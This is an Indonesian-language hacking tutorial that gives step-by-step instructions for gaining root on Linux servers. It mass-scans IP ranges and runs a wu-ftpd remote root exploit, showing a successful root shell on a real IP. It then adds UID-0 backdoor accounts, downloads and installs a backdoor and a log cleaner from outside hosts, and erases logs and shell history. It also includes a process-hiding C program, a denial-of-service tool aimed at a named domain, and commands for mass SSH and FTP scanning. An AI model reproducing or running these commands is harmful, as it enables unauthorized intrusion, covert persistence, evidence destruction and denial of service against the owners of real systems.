Cracking Root ======================================================= Tips: mkdir .bash <----untuk membuat direktori bash cd .bash <---untuk masuk ke direktori bash mkdir <--- untuk membuat direktory baru cd <--- untuk masuk ke direktory yg anda mau cd / <--- untuk keluar dari suatu direktory rm -rf <--- untuk menghapus file/direktory 1. Tahap Pertama Cara instalasi Xpost dan ftp wget http://cyberborneo.b0x.com/xpost.tgz wget http://cyberborneo.b0x.com/ftp.tgz tar -zxvf xpost.tgz tar -zxvf ftp.tgz ====================================================== 2. Tahap Kedua cd xpost cd xwurm/ ./scan 213.124 setelah dapat wu-scan.log ./masswu wu-scan.log Setelah didapat pesan sebagai berikut Trying get root 213.124.151.113 ... SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ... Logged in log-root ... Itu berarti anda telah dapat akses root di IP 213.124.151.113 ====================================================== 3. Tahap Ketiga Buka new sessiom dari putty ssh anda, login kembali ke shell anda masuk ke direktory ftp anda cd ftp ./awu 213.124.151.113 ( ip nya) apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb: 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). # trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected. # banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready. # successfully selected target from banner ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] # 1. filling memory gaps # 2. sending bigbuf + fakechunk building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ############################################################################ uid=0(root) gid=0(root) groups=50(ftp) Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown whoami root <-- berarti anda sedang dalam akses root ====================================================== 4. Tahap Keempat Add login akses root anda --------------------------------------------------------------- 1. Cara I (bukan utk redhat 7.2) /usr/sbin/useradd rampok -u 0 -d / passwd -d rampok passwd rampok su rampok <<--------untuk super user 2. Cara II kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit abis itu ketik lagi passwd crit wuasu666 Kemudian Add User untuk login shell anda /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html passwd html fuck666 2X ======================================================= 5. Tahap Kelima Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan wget www.utay-doyan.cc/shv4.tar.gz tar -zxvf shv4.tar.gz cd shv4 ./setup pass yang dimau port yang dimau contoh : --> ./setup wuasu 7000 cd / wget http://cyberborneo.b0x.com/cleaner.tgz tar -zxvf cleaner.tgz cd cleaner ./install Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak rm -rf cleaner.tgz rm -rf shv4.tar.gz =========================================== 6. Tahap Keenam Hapus jejak ngeroot anda ketik perintah berikut: rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /devory ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog ctrl d SELESAI..... ============================================================ Satu tips buat menghacurkan shell anda yang rusak ato sudah dihapus password loginnya oleh admin, dengan catatan anda masih berada dalam shell itu juga, yaitu: wget http://cyberborneo.b0x.com/xzibit.tar.gz tar -zxvf xzibit.tar.gz cd lamerk ./install cd / rm -rf lamerk xzibit.tar.gz ============================================================ Beberapa Link Yang bagus buat program2 eksploit, DDOS, Sniffing, Security Tools etc.... http://www.angelfire.com/de2/sirex3/linux.html http://www.megspace.com/internet/wet/linux.html http://www.s0ftpj.org/en/tools.html http://web.textfiles.com/hacking/ http://www.honeynet.org/scans/ http://www.honeynet.org/scans/scan15/som/som30.txt http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html http://www.attrition.org/mirror/attrition/2000-07.html/ http://www.sans.org/rr/infowar/hacktivism2.php http://www.antihackertoolkit.com/tools.html http://www.hackinglinux.co.uk/ http://www.virtro.de/now_inhalt.html http://packetstormsecurity.nl/misc.html http://www.ariska.net/ http://www.valisie.com/Vali/ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ obat tembak.c >>echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all # Disables packet forwarding net.ipv4.ip_forward = 0 # Enables source route verification net.ipv4.conf.all.rp_filter = 1 # Disables automatic defragmentation (needed for masquerading, LVS) net.ipv4.ip_always_defrag = 1 # Disables the magic-sysrq key kernel.sysrq = 0 you can get sample for "blockping.tar.gz" just extract and move them to /usr/bin/ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ***Jalanin Tembak.c*** ./fake bash ./tembak zipey.net 53 (Pake Hidder tanpa Login Root) ./tembak ipaddress 53 atau ./tembak zipey.com 53 ./tembak zipey.com 53 -->> artinya nembak zipey.com lewat port 53 (ditembak port 53 nya pasti mati) ./fake proses_asli proses_palsu ./fake httpd ./teso -h 202.202.202.202 ./fake -bash ./bnc bnc.conf ./fake pico ./eggdrop -m FroGStoNe +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ * Fake Background Buatan buDZ Greetz to : fabianclone,EF73 and all #betalmostdone and #antihackerlink /* [ilang.c] File Paling Oke Untuk Menghilangkan BackGround unTuk Eggdrop Dan BnC. [http://members.tripod.com/alltoolkit] woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU CrEatEd bY buDZ */ #include #include #include #include #include char fake[1000]; int main(int argc,char **argv) { if(argc < 3) { exit(0); } strcpy(fake,argv[1]);strcat(fake, " " " " " "); execl(argv[2],fake,argv[3],argv[4],argv[5],argv[6],argv[7],argv[8],NULL); exit(0);} +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ***Hide BG procces*** gcc -o namafile undo1.c chmod +x namafile ./undo httpd ./eggdrop -m eggdrop.conf +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ***Wipe Login User*** (ngejalaninnya pake login Root) upload wipe ke dir-user chmod +x wipe ./wipe u username ./wipe l username ./wipe w username ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #!/bin/sh clear echo "log CLEANING SERVICE - rahul-x" echo " " echo "bersih... bersih... " echo "Removing Files....." echo " " rm -f ~root/.bash_history rm -f /var/log/lastlog rm -f /var/log/netconf.log rm -f /var/log/boot.log rm -f /var/log/messages rm -f /var/log/secure rm -f /var/log/xferlog echo "Creating Files......" echo " " touch ~root/.bash_history touch /var/log/lastlog touch /var/log/netconf.log touch /var/log/boot.log touch /var/log/messages touch /var/log/secure touch /var/log/xferlog echo "Change Mode Files..." echo " " chmod 0664 ~root/.bash_history chmod 0664 /var/log/lastlog chmod 0664 /var/log/netconf.log chmod 0664 /var/log/boot.log chmod 0664 /var/log/messages chmod 0664 /var/log/secure chmod 0664 /var/log/xferlog echo " " echo "riped riped riped by rahul-x : ... " echo " viva indonesia " echo " " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Menutup hole pada samba terhadap serangan sambal.c Untuk mengatasi hal tersebut, ada satu teknik yang sangat gampang. Yaitu dengan melakukan editing pada file smb.conf Anda cukup mencari bagian ---------------- [netlogon] comment = Network Logon Service path = /usr/local/samba/lib/netlogon guest ok = yes writable = no share modes = no ---------------- Terus ubah bagian guest ok = yes menjadi guest ok = no Selanjutnya matikan samba nya dengan command /etc/init.d/smb stop untuk menon-aktifkan configurasi samba yang aktif. Kemudian hidupkan kembali dengan commmand /etc/init.d/smb start untuk menjalankan configurasi yang baru. Dengan melakukan perubahan tersebut, coba anda lakukan exploitasi lagi +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ cat /etc/passwd copy-paste ke notepad cari yg ada akhiran bash <<= bisa di jadikan root lagi liat yg ada numeric => :x::255::255: ganti yg di tangah jadi 0 trus you ingatin user nya yg kamu ganti jadi 0 itu apa cat > /etc/passwd enter trus paste lagi trus tekan control D trus tekan control c liat berhasil ga berubah ga 255 itu jadi 0 passwd user <<= ingat tadi apa nama user yg kamu ganti 255 nya jadi 0 trus klo udah login su langsung ke cd /lib/security bikin direkc pam_res.so cd pam_res.so wget cleaner disana dalam pam_res.so ga boleh selain root harus you ganti usernya name nya jadi root +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ openBSD: wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz tar -zxvf openssh-3.4p1.tar.gz wget www.renjana.com/sshutup-theo.tar.gz tar -zxvf sshutup-theo.tar.gz ls -al sshutuptheo cd openssh-3.4p1 patch < ssh.diff ./configure make ssh ./ssh -l root IP co: ./ssh -l root shah.koptevo.net http://www.netcraft.com/whats/?host=www.t-mems.com.tw +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ngeROOT ssh LINUX port 22: wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz tar -zxvf grabbb-0.1.0.tar.gz.tar.gz gcc -o grabbb grabbb.c cd grabbb ./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22 66.201.243.210 wget www.suckmyass.org/ssh-scan8.tar.gz tar cd ssh-scan8 ./r00t 203.20 -d 4 <--- scan massal SSH ./r00t 203.20 -d 2 <--- scan massal FTP ./r00t 203.20 -d 3 <--- scan massal FTP ./r00t 134.7. -d 4 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ngROOT pake massaphace: ./massossl 200 443 160 artinya scan ip 200.160 port 443 port 443 jangan diganti, kecuali ip boleh dari ip 1 - 254 kecuali ip 192.x.x.x lawan 10.x.x.x kada kawa discan, soalnya ip intranet +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++